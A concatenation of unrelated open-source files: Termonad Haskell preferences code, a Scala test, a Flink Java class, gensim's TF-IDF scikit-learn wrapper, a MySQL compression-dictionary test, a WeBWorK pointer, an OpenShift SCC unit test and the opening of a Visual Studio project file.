let hasTermonadHs = takeFileName executablePath == "termonad-linux-x86_64"
widgetSetVisible warningLabel hasTermonadHs
-- Make the dialog modal
maybeWin <- applicationGetActiveWindow app
windowSetTransientFor preferencesDialog maybeWin
-- Init with current state
fontChooserSetFontDesc fontButton (tmState ^. lensTMStateFontDesc)
let options = tmState ^. lensTMStateConfig . lensOptions
comboBoxSetActive showScrollbarComboBoxText $ options ^. lensShowScrollbar
comboBoxSetActive showTabBarComboBoxText $ options ^. lensShowTabBar
comboBoxSetActive cursorBlinkModeComboBoxText $ options ^. lensCursorBlinkMode
spinButtonSetValue
scrollbackLenSpinButton
(fromIntegral $ options ^. lensScrollbackLen)
toggleButtonSetActive confirmExitCheckButton $ options ^. lensConfirmExit
toggleButtonSetActive showMenuCheckButton $ options ^. lensShowMenu
entryBufferSetText
wordCharExceptionsEntryBuffer
(options ^. lensWordCharExceptions)
(-1)
-- Run dialog then close
res <- dialogRun preferencesDialog
-- When closing the dialog get the new settings
when (toEnum (fromIntegral res) == ResponseTypeAccept) $ do
maybeFontDesc <- fontChooserGetFontDesc fontButton
maybeFontConfig <-
liftM join $ mapM fontConfigFromFontDescription maybeFontDesc
maybeShowScrollbar <-
comboBoxGetActive showScrollbarComboBoxText [ShowScrollbarNever ..]
maybeShowTabBar <-
comboBoxGetActive showTabBarComboBoxText [ShowTabBarNever ..]
maybeCursorBlinkMode <-
comboBoxGetActive cursorBlinkModeComboBoxText [CursorBlinkModeSystem ..]
scrollbackLen <-
fromIntegral <$> spinButtonGetValueAsInt scrollbackLenSpinButton
confirmExit <- toggleButtonGetActive confirmExitCheckButton
showMenu <- toggleButtonGetActive showMenuCheckButton
wordCharExceptions <- entryBufferGetText wordCharExceptionsEntryBuffer
-- Apply the changes to mvarTMState
modifyMVar_ mvarTMState $ pure
. over lensTMStateFontDesc (`fromMaybe` maybeFontDesc)
. over (lensTMStateConfig . lensOptions)
( set lensConfirmExit confirmExit
. set lensShowMenu showMenu
. set lensWordCharExceptions wordCharExceptions
. over lensFontConfig (`fromMaybe` maybeFontConfig)
. set lensScrollbackLen scrollbackLen
. over lensShowScrollbar (`fromMaybe` maybeShowScrollbar)
. over lensShowTabBar (`fromMaybe` maybeShowTabBar)
. over lensCursorBlinkMode (`fromMaybe` maybeCursorBlinkMode)
)
-- Save the changes to the preferences files
withMVar mvarTMState $ saveToPreferencesFile . view lensTMStateConfig
-- Update the app with new settings
applyNewPreferences mvarTMState
widgetDestroy preferencesDialog
appStartup :: Application -> IO ()
appStartup _app = pure ()
-- | Run Termonad with the given 'TMConfig'.
--
-- Do not perform any of the recompilation operations that the 'defaultMain'
-- function does.
start :: TMConfig -> IO ()
start tmConfig = do
-- app <- appNew (Just "haskell.termonad") [ApplicationFlagsFlagsNone]
-- Make sure the application is not unique, so we can open multiple copies of it.
app <- appNew Nothing [ApplicationFlagsFlagsNone]
void $ onApplicationStartup app (appStartup app)
void $ onApplicationActivate app (appActivate tmConfig app)
void $ applicationRun app Nothing
-- | Run Termonad with the given 'TMConfig'.
--
-- This function will check if there is a @~\/.config\/termonad\/termonad.hs@ file
-- and a @~\/.cache\/termonad\/termonad-linux-x86_64@ binary. Termonad will
-- perform different actions based on whether or not these two files exist.
--
-- Here are the four different possible actions based on the existence of these
-- two files.
--
-- - @~\/.config\/termonad\/termonad.hs@ exists, @~\/.cache\/termonad\/termonad-linux-x86_64@ exists
--
-- The timestamps of these two files are checked. If the
-- @~\/.config\/termonad\/termonad.hs@ file has been modified after the
-- @~\/.cache\/termonad\/termonad-linux-x86_64@ binary, then Termonad will use
-- GHC to recompile the @~\/.config\/termonad\/termonad.hs@ file, producing a
-- new binary at @~\/.cache\/termonad\/termonad-linux-x86_64@. This new binary
-- will be re-executed. The 'TMConfig' passed to this 'defaultMain' will be
-- effectively thrown away.
--
-- If GHC fails to recompile the @~\/.config\/termonad\/termonad.hs@ file, then
-- Termonad will just execute 'start' with the 'TMConfig' passed in.
--
-- If the @~\/.cache\/termonad\/termonad-linux-x86_64@ binary has been modified
-- after the @~\/.config\/termonad\/termonad.hs@ file, then Termonad will
-- re-exec the @~\/.cache\/termonad\/termonad-linux-x86_64@ binary. The
-- 'TMConfig' passed to this 'defaultMain' will be effectively thrown away.
--
-- - @~\/.config\/termonad\/termonad.hs@ exists, @~\/.cache\/termonad\/termonad-linux-x86_64@ does not exist
--
-- Termonad will use GHC to recompile the @~\/.config\/termonad\/termonad.hs@
-- file, producing a new binary at @~\/.cache\/termonad\/termonad-linux-x86_64@.
-- This new binary will be re-executed. The 'TMConfig' passed to this
-- 'defaultMain' will be effectively thrown away.
--
-- If GHC fails to recompile the @~\/.config\/termonad\/termonad.hs@ file, then
-- Termonad will just execute 'start' with the 'TMConfig' passed in.
--
-- - @~\/.config\/termonad\/termonad.hs@ does not exist, @~\/.cache\/termonad\/termonad-linux-x86_64@ exists
--
-- Termonad will ignore the @~\/.cache\/termonad\/termonad-linux-x86_64@ binary
-- and just run 'start' with the 'TMConfig' passed to this function.
--
-- - @~\/.config\/termonad\/termonad.hs@ does not exist, @~\/.cache\/termonad\/termonad-linux-x86_64@ does not exist
--
-- Termonad will run 'start' with the 'TMConfig' passed to this function.
--
-- Other notes:
--
-- 1. That the locations of @~\/.config\/termonad\/termonad.hs@ and
-- @~\/.cache\/termonad\/termonad-linux-x86_64@ may differ depending on your
-- system.
--
-- 2. In your own @~\/.config\/termonad\/termonad.hs@ file, you can use either
-- 'defaultMain' or 'start'. As long as you always execute the system-wide
-- @termonad@ binary (instead of the binary produced as
-- @~\/.cache\/termonad\/termonad-linux-x86_64@), the effect should be the same.
defaultMain :: TMConfig -> IO ()
defaultMain tmConfig = do
let params =
defaultParams
{ projectName = "termonad"
, showError = \(cfg, oldErrs) newErr -> (cfg, oldErrs <> "\n" <> newErr)
, realMain = \(cfg, errs) -> putStrLn (pack errs) *> start cfg
}
eitherRes <- tryIOError $ wrapMain params (tmConfig, "")
case eitherRes of
Left ioErr
| ioeGetErrorType ioErr == doesNotExistErrorType && ioeGetFileName ioErr == Just "ghc" -> do
putStrLn $
"Could not find ghc on your PATH. Ignoring your termonad.hs " <>
"configuration file and running termonad with default settings."
start tmConfig
| otherwise -> do
putStrLn $ "IO error occurred when trying to run termonad:"
print ioErr
putStrLn "Don't know how to recover. Exiting."
Right _ -> pure ()
| {
"pile_set_name": "Github"
} |
trait SAMTrait:
def first(): String
def wait(): Unit // error
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.flink.runtime.event;
import org.apache.flink.core.io.IOReadableWritable;
import org.apache.flink.runtime.taskexecutor.TaskExecutor;
/**
* This type of event can be used to exchange notification messages between
* different {@link TaskExecutor} objects at runtime using the communication
* channels.
*/
public abstract class AbstractEvent implements IOReadableWritable {}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""Scikit learn interface for :class:`~gensim.models.tfidfmodel.TfidfModel`.
Follows scikit-learn API conventions to facilitate using gensim along with scikit-learn.
Examples
--------
.. sourcecode:: pycon
>>> from gensim.test.utils import common_corpus, common_dictionary
>>> from gensim.sklearn_api import TfIdfTransformer
>>>
>>> # Transform the word counts inversely to their global frequency using the sklearn interface.
>>> model = TfIdfTransformer(dictionary=common_dictionary)
>>> tfidf_corpus = model.fit_transform(common_corpus)
"""
from sklearn.base import TransformerMixin, BaseEstimator
from sklearn.exceptions import NotFittedError
from gensim.models import TfidfModel
import gensim
class TfIdfTransformer(TransformerMixin, BaseEstimator):
"""Base TfIdf module, wraps :class:`~gensim.models.tfidfmodel.TfidfModel`.
For more information please have a look to `tf-idf <https://en.wikipedia.org/wiki/Tf%E2%80%93idf>`_.
"""
def __init__(self, id2word=None, dictionary=None, wlocal=gensim.utils.identity,
wglobal=gensim.models.tfidfmodel.df2idf, normalize=True, smartirs="nfc",
pivot=None, slope=0.65):
"""
Parameters
----------
id2word : {dict, :class:`~gensim.corpora.Dictionary`}, optional
Mapping from int id to word token, that was used for converting input data to bag of words format.
dictionary : :class:`~gensim.corpora.Dictionary`, optional
If specified it will be used to directly construct the inverse document frequency mapping.
wlocals : function, optional
Function for local weighting, default for `wlocal` is :func:`~gensim.utils.identity` which does nothing.
Other options include :func:`math.sqrt`, :func:`math.log1p`, etc.
wglobal : function, optional
Function for global weighting, default is :func:`~gensim.models.tfidfmodel.df2idf`.
normalize : bool, optional
It dictates how the final transformed vectors will be normalized. `normalize=True` means set to unit length
(default); `False` means don't normalize. You can also set `normalize` to your own function that accepts
and returns a sparse vector.
smartirs : str, optional
SMART (System for the Mechanical Analysis and Retrieval of Text) Information Retrieval System,
a mnemonic scheme for denoting tf-idf weighting variants in the vector space model.
The mnemonic for representing a combination of weights takes the form XYZ,
for example 'ntc', 'bpn' and so on, where the letters represents the term weighting of the document vector.
local_letter : str
Term frequency weighing, one of:
* `b` - binary,
* `t` or `n` - raw,
* `a` - augmented,
* `l` - logarithm,
* `d` - double logarithm,
* `L` - log average.
global_letter : str
Document frequency weighting, one of:
* `x` or `n` - none,
* `f` - idf,
* `t` - zero-corrected idf,
* `p` - probabilistic idf.
normalization_letter : str
Document normalization, one of:
* `x` or `n` - none,
* `c` - cosine,
* `u` - pivoted unique,
* `b` - pivoted character length.
Default is `nfc`.
For more info, visit `"Wikipedia" <https://en.wikipedia.org/wiki/SMART_Information_Retrieval_System>`_.
pivot : float, optional
It is the point around which the regular normalization curve is `tilted` to get the new pivoted
normalization curve. In the paper `Amit Singhal, Chris Buckley, Mandar Mitra:
"Pivoted Document Length Normalization" <http://singhal.info/pivoted-dln.pdf>`_ it is the point where the
retrieval and relevance curves intersect.
This parameter along with `slope` is used for pivoted document length normalization.
When `pivot` is None, `smartirs` specifies the pivoted unique document normalization scheme, and either
`corpus` or `dictionary` are specified, then the pivot will be determined automatically. Otherwise, no
pivoted document length normalization is applied.
slope : float, optional
It is the parameter required by pivoted document length normalization which determines the slope to which
the `old normalization` can be tilted. This parameter only works when pivot is defined by user and is not
None.
See Also
--------
~gensim.models.tfidfmodel.TfidfModel : Class that also uses the SMART scheme.
~gensim.models.tfidfmodel.resolve_weights : Function that also uses the SMART scheme.
"""
self.gensim_model = None
self.id2word = id2word
self.dictionary = dictionary
self.wlocal = wlocal
self.wglobal = wglobal
self.normalize = normalize
self.smartirs = smartirs
self.slope = slope
self.pivot = pivot
def fit(self, X, y=None):
"""Fit the model according to the given training data.
Parameters
----------
X : iterable of iterable of (int, int)
Input corpus
Returns
-------
:class:`~gensim.sklearn_api.tfidf.TfIdfTransformer`
The trained model.
"""
self.gensim_model = TfidfModel(
corpus=X, id2word=self.id2word, dictionary=self.dictionary, wlocal=self.wlocal,
wglobal=self.wglobal, normalize=self.normalize, smartirs=self.smartirs,
pivot=self.pivot, slope=self.slope
)
return self
def transform(self, docs):
"""Get the tf-idf scores in BoW representation for `docs`
Parameters
----------
docs: {iterable of list of (int, number), list of (int, number)}
Document or corpus in BoW format.
Returns
-------
iterable of list (int, float) 2-tuples.
The BOW representation of each document. Will have the same shape as `docs`.
"""
if self.gensim_model is None:
raise NotFittedError(
"This model has not been fitted yet. Call 'fit' with appropriate arguments before using this method."
)
# input as python lists
if isinstance(docs[0], tuple):
docs = [docs]
return [self.gensim_model[doc] for doc in docs]
| {
"pile_set_name": "Github"
} |
SET @numbers = 'one' 'two' 'three' 'four';
# define a stored procedure which would create a compression dictionary
DELIMITER //;
CREATE PROCEDURE create_zip_dict(IN data TEXT)
BEGIN
SET @data_var = data;
CREATE COMPRESSION_DICTIONARY dict(@data_var);
END //
DELIMITER ;//
# define a stored procedure which would create a new table referencing
# a compression dictionary
DELIMITER //;
CREATE PROCEDURE create_table_referencing_zip_dict()
BEGIN
CREATE TABLE t1(
id INT,
a BLOB COLUMN_FORMAT COMPRESSED WITH COMPRESSION_DICTIONARY dict
) ENGINE=InnoDB;
END //
DELIMITER ;//
# execute both procedures defined above
CALL create_zip_dict(@numbers);
CALL create_table_referencing_zip_dict();
# check if corresponding records were added to 'compression_dictionary' and
# 'compression_dictionary_tables' tables in 'information_schema'.
#
SELECT dict_data = @numbers AS zip_dict_data_match FROM information_schema.compression_dictionary WHERE dict_name = 'dict';
SELECT dict_name = 'dict' AS dict_names_match FROM information_schema.compression_dictionary_tables
WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME = 't1' AND COLUMN_NAME = 'a';
# define a stored procedure which would create both a compression dictionary
# and a table referencing it inside a single call
DELIMITER //;
CREATE PROCEDURE create_zip_dict_and_table(IN data TEXT)
BEGIN
SET @data_var = data;
CREATE COMPRESSION_DICTIONARY another_dict(@data_var);
CREATE TABLE t2(
id INT,
a BLOB COLUMN_FORMAT COMPRESSED WITH COMPRESSION_DICTIONARY another_dict
) ENGINE=InnoDB;
END //
DELIMITER ;//
# call this procedure
CALL create_zip_dict_and_table(@numbers);
# check if corresponding records were added to 'compression_dictionary' and
# 'compression_dictionary_tables' tables in 'information_schema' for the
# compression dictionary and table created by 'create_zip_dict_and_table()' .
SELECT dict_data = @numbers AS another_zip_dict_data_match FROM information_schema.compression_dictionary WHERE dict_name = 'another_dict';
SELECT dict_name= 'another_dict' AS another_dict_names_match FROM information_schema.compression_dictionary_tables
WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME = 'antoher_dict' AND COLUMN_NAME = 'a';
# define a JSON-formatted value
SET @json_value =
'[\n'
' {\n'
' "one" = 0,\n'
' "two" = 0,\n'
' "three" = 0,\n'
' "four" = 0\n'
' },\n'
' {\n'
' "one" = 0,\n'
' "two" = 0,\n'
' "three" = 0,\n'
' "four" = 0\n'
' },\n'
' {\n'
' "one" = 0,\n'
' "two" = 0,\n'
' "three" = 0,\n'
' "four" = 0\n'
' },\n'
' {\n'
' "one" = 0,\n'
' "two" = 0,\n'
' "three" = 0,\n'
' "four" = 0\n'
' }\n'
']\n'
;
# define a stored procedure which would insert a record into
# the first table
DELIMITER //;
CREATE PROCEDURE insert_zip_record(IN id INT, IN data TEXT)
BEGIN
INSERT INTO t1 VALUES(id, data);
END //
DELIMITER ;//
# call record insertion stored procedure
CALL insert_zip_record(1, @json_value);
# define a function which would return MD5 hash of the BLOB
# by the given id
DELIMITER //;
CREATE FUNCTION get_zip_record_hash(k INT) RETURNS CHAR(32) READS SQL DATA
BEGIN
DECLARE res CHAR(32);
DECLARE found INT DEFAULT TRUE;
DECLARE cur CURSOR FOR SELECT MD5(a) FROM t1 WHERE id = k;
DECLARE CONTINUE HANDLER FOR NOT FOUND SET found = FALSE;
OPEN cur;
FETCH cur INTO res;
IF NOT found THEN
SET res = REPEAT('x', 32);
END IF;
CLOSE cur;
RETURN res;
END //
DELIMITER ;//
# calculate MD5 hash of the BLOB directly from the first table
SELECT MD5(a) INTO @expected_hash_value FROM t1 WHERE id = 1;
# call the function and check if it returns expected result
SELECT get_zip_record_hash(1) = @expected_hash_value AS hash_values_match;
# define a stored procedure which would delete a record from
# the first table by the given id
DELIMITER //;
CREATE PROCEDURE delete_zip_record(k INT)
BEGIN
DELETE FROM t1 WHERE id = k;
END //
DELIMITER ;//
# call record deletion stored procedure
CALL delete_zip_record(1);
# call the function 'get_zip_record_hash()' and check if it returns special
# value
SELECT get_zip_record_hash(1) = REPEAT('x', 32) AS hash_values_match;
# define a stored procedure which would remove tables and compression
# dictionaries created earlier
DELIMITER //;
CREATE PROCEDURE remove_zip_dicts_and_tables()
BEGIN
DROP TABLE t1, t2;
DROP COMPRESSION_DICTIONARY dict;
DROP COMPRESSION_DICTIONARY another_dict;
END //
DELIMITER ;//
# call clenup procedure
CALL remove_zip_dicts_and_tables();
# make sure that the changes are reflected in 'information_schema'
SELECT COUNT(*) = 0 AS dictionary_references_removed FROM information_schema.compression_dictionary_tables WHERE table_name IN ('t1', 't2');
SELECT COUNT(*) = 0 AS dictionaries_removed FROM information_schema.compression_dictionary WHERE dict_name IN ('dict', 'another_dict');
# remove stored procedures created earlier
DROP PROCEDURE create_zip_dict;
DROP PROCEDURE create_table_referencing_zip_dict;
DROP PROCEDURE create_zip_dict_and_table;
DROP PROCEDURE insert_zip_record;
DROP FUNCTION get_zip_record_hash;
DROP PROCEDURE delete_zip_record;
DROP PROCEDURE remove_zip_dicts_and_tables;
# create a compression dictionary using prepared statement
SET @create_zip_dict_sql = CONCAT('CREATE COMPRESSION_DICTIONARY dict(\'', @numbers, '\');');
PREPARE create_zip_dict_stmt FROM @create_zip_dict_sql;
EXECUTE create_zip_dict_stmt;
DEALLOCATE PREPARE create_zip_dict_stmt;
# create a table referencing a compression dictionary using prepared statement
SET @create_table_referencing_zip_dict_sql =
'CREATE TABLE t1('
' id INT,'
' a BLOB COLUMN_FORMAT COMPRESSED WITH COMPRESSION_DICTIONARY dict'
') ENGINE=InnoDB;'
;
PREPARE create_table_referencing_zip_dict_stmt FROM @create_table_referencing_zip_dict_sql;
EXECUTE create_table_referencing_zip_dict_stmt;
DEALLOCATE PREPARE create_table_referencing_zip_dict_stmt;
# make sure new records appear in the 'information_schema'
SELECT dict_data = @numbers AS zip_dict_data_match FROM information_schema.compression_dictionary WHERE dict_name = 'dict';
SELECT dict_name = 'dict' AS dict_names_match FROM information_schema.compression_dictionary_tables
WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME = 't1' AND COLUMN_NAME = 'a';
# insert a record into the first table using prepared statement
PREPARE insert_zip_record_stmt FROM 'INSERT INTO t1 VALUES(?, ?);';
SET @blob_key = 1;
EXECUTE insert_zip_record_stmt USING @blob_key, @json_value;
DEALLOCATE PREPARE insert_zip_record_stmt;
# calculate MD5 hash of the BLOB directly from the first table
SELECT MD5(a) INTO @expected_hash_value FROM t1 WHERE id = 1;
# get MD5 hash of the BLOB by the given id using prepared statement
PREPARE get_zip_record_hash_stmt FROM 'SELECT IF(COUNT(*) = 0, REPEAT(\'x\', 32), MD5(MAX(a))) INTO @ps_hash_value FROM t1 WHERE id = ?;';
EXECUTE get_zip_record_hash_stmt USING @blob_key;
SELECT @ps_hash_value = @expected_hash_value AS hash_values_match;
# delete a record from the first table using prepared statement
PREPARE delete_zip_record_stmt FROM 'DELETE FROM t1 WHERE id = ?;';
EXECUTE delete_zip_record_stmt USING @blob_key;
DEALLOCATE PREPARE delete_zip_record_stmt;
# get special value for MD5 hash from the 'get_zip_record_hash_stmt()'
# prepared statement after deletion
EXECUTE get_zip_record_hash_stmt USING @blob_key;
DEALLOCATE PREPARE get_zip_record_hash_stmt;
SELECT @ps_hash_value = REPEAT('x', 32) AS hash_values_match;
# remove the table created by 'create_table_referencing_zip_dict_stmt()'
# using prepared statement
PREPARE remove_table_referencing_zip_dict_stmt FROM 'DROP TABLE t1';
EXECUTE remove_table_referencing_zip_dict_stmt;
DEALLOCATE PREPARE remove_table_referencing_zip_dict_stmt;
# remove the compression dictionary created by 'create_zip_dict_stmt()'
# using prepared statement
PREPARE remove_zip_dict_stmt FROM 'DROP COMPRESSION_DICTIONARY dict;';
EXECUTE remove_zip_dict_stmt;
DEALLOCATE PREPARE remove_zip_dict_stmt;
# make sure that the changes are reflected in 'information_schema'
#
SELECT COUNT(*) = 0 AS dictionary_references_removed FROM information_schema.compression_dictionary_tables WHERE table_name IN ('t1', 't2');
SELECT COUNT(*) = 0 AS dictionaries_removed FROM information_schema.compression_dictionary WHERE dict_name IN ('dict', 'another_dict');
| {
"pile_set_name": "Github"
} |
# This file is just a pointer to the file
#
# "Library/ASU-topics/setStat/dueck13_2_3.pg"
#
# You may want to change your problem set to use that problem
# directly, especially if you want to make a copy of the problem
# for modification.
DOCUMENT();
includePGproblem("Library/ASU-topics/setStat/dueck13_2_3.pg");
ENDDOCUMENT();
## These tags keep this problem from being added to the NPL database
##
## DBsubject('ZZZ-Inserted Text')
## DBchapter('ZZZ-Inserted Text')
## DBsection('ZZZ-Inserted Text')
| {
"pile_set_name": "Github"
} |
package policy
import (
"bytes"
"reflect"
"testing"
"k8s.io/apimachinery/pkg/runtime"
clientgotesting "k8s.io/client-go/testing"
kapi "k8s.io/kubernetes/pkg/api"
authorizationapi "github.com/openshift/origin/pkg/authorization/apis/authorization"
securityapi "github.com/openshift/origin/pkg/security/apis/security"
securityfakeclient "github.com/openshift/origin/pkg/security/generated/internalclientset/fake"
)
func TestModifySCC(t *testing.T) {
tests := map[string]struct {
startingSCC *securityapi.SecurityContextConstraints
subjects []kapi.ObjectReference
expectedSCC *securityapi.SecurityContextConstraints
remove bool
}{
"add-user-to-empty": {
startingSCC: &securityapi.SecurityContextConstraints{},
subjects: []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.UserKind}, {Name: "two", Kind: authorizationapi.UserKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
remove: false,
},
"add-user-to-existing": {
startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one"}},
subjects: []kapi.ObjectReference{{Name: "two", Kind: authorizationapi.UserKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
remove: false,
},
"add-user-to-existing-with-overlap": {
startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one"}},
subjects: []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.UserKind}, {Name: "two", Kind: authorizationapi.UserKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
remove: false,
},
"add-sa-to-empty": {
startingSCC: &securityapi.SecurityContextConstraints{},
subjects: []kapi.ObjectReference{{Namespace: "a", Name: "one", Kind: authorizationapi.ServiceAccountKind}, {Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one", "system:serviceaccount:b:two"}},
remove: false,
},
"add-sa-to-existing": {
startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one"}},
subjects: []kapi.ObjectReference{{Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "system:serviceaccount:b:two"}},
remove: false,
},
"add-sa-to-existing-with-overlap": {
startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one"}},
subjects: []kapi.ObjectReference{{Namespace: "a", Name: "one", Kind: authorizationapi.ServiceAccountKind}, {Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one", "system:serviceaccount:b:two"}},
remove: false,
},
"add-group-to-empty": {
startingSCC: &securityapi.SecurityContextConstraints{},
subjects: []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.GroupKind}, {Name: "two", Kind: authorizationapi.GroupKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
remove: false,
},
"add-group-to-existing": {
startingSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one"}},
subjects: []kapi.ObjectReference{{Name: "two", Kind: authorizationapi.GroupKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
remove: false,
},
"add-group-to-existing-with-overlap": {
startingSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one"}},
subjects: []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.GroupKind}, {Name: "two", Kind: authorizationapi.GroupKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
remove: false,
},
"remove-user": {
startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
subjects: []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.UserKind}, {Name: "two", Kind: authorizationapi.UserKind}},
expectedSCC: &securityapi.SecurityContextConstraints{},
remove: true,
},
"remove-user-from-existing-with-overlap": {
startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
subjects: []kapi.ObjectReference{{Name: "two", Kind: authorizationapi.UserKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one"}},
remove: true,
},
"remove-sa": {
startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one", "system:serviceaccount:b:two"}},
subjects: []kapi.ObjectReference{{Namespace: "a", Name: "one", Kind: authorizationapi.ServiceAccountKind}, {Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
expectedSCC: &securityapi.SecurityContextConstraints{},
remove: true,
},
"remove-sa-from-existing-with-overlap": {
startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one", "system:serviceaccount:b:two"}},
subjects: []kapi.ObjectReference{{Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one"}},
remove: true,
},
"remove-group": {
startingSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
subjects: []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.GroupKind}, {Name: "two", Kind: authorizationapi.GroupKind}},
expectedSCC: &securityapi.SecurityContextConstraints{},
remove: true,
},
"remove-group-from-existing-with-overlap": {
startingSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
subjects: []kapi.ObjectReference{{Name: "two", Kind: authorizationapi.GroupKind}},
expectedSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one"}},
remove: true,
},
}
for tcName, tc := range tests {
fakeClient := securityfakeclient.NewSimpleClientset()
fakeClient.Fake.PrependReactor("get", "securitycontextconstraints", func(action clientgotesting.Action) (handled bool, ret runtime.Object, err error) {
return true, tc.startingSCC, nil
})
var actualSCC *securityapi.SecurityContextConstraints
fakeClient.Fake.PrependReactor("update", "securitycontextconstraints", func(action clientgotesting.Action) (handled bool, ret runtime.Object, err error) {
actualSCC = action.(clientgotesting.UpdateAction).GetObject().(*securityapi.SecurityContextConstraints)
return true, actualSCC, nil
})
o := &SCCModificationOptions{
SCCName: "foo",
SCCInterface: fakeClient.Security().SecurityContextConstraints(),
DefaultSubjectNamespace: "",
Subjects: tc.subjects,
Out: &bytes.Buffer{},
}
var err error
if tc.remove {
err = o.RemoveSCC()
} else {
err = o.AddSCC()
}
if err != nil {
t.Errorf("%s: unexpected err %v", tcName, err)
}
if e, a := tc.expectedSCC.Users, actualSCC.Users; !reflect.DeepEqual(e, a) {
t.Errorf("%s: expected %v, actual %v", tcName, e, a)
}
if e, a := tc.expectedSCC.Groups, actualSCC.Groups; !reflect.DeepEqual(e, a) {
t.Errorf("%s: expected %v, actual %v", tcName, e, a)
}
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{57930B58-FE07-422A-BA81-636AAE3525B6}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>injectAllTheThings</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
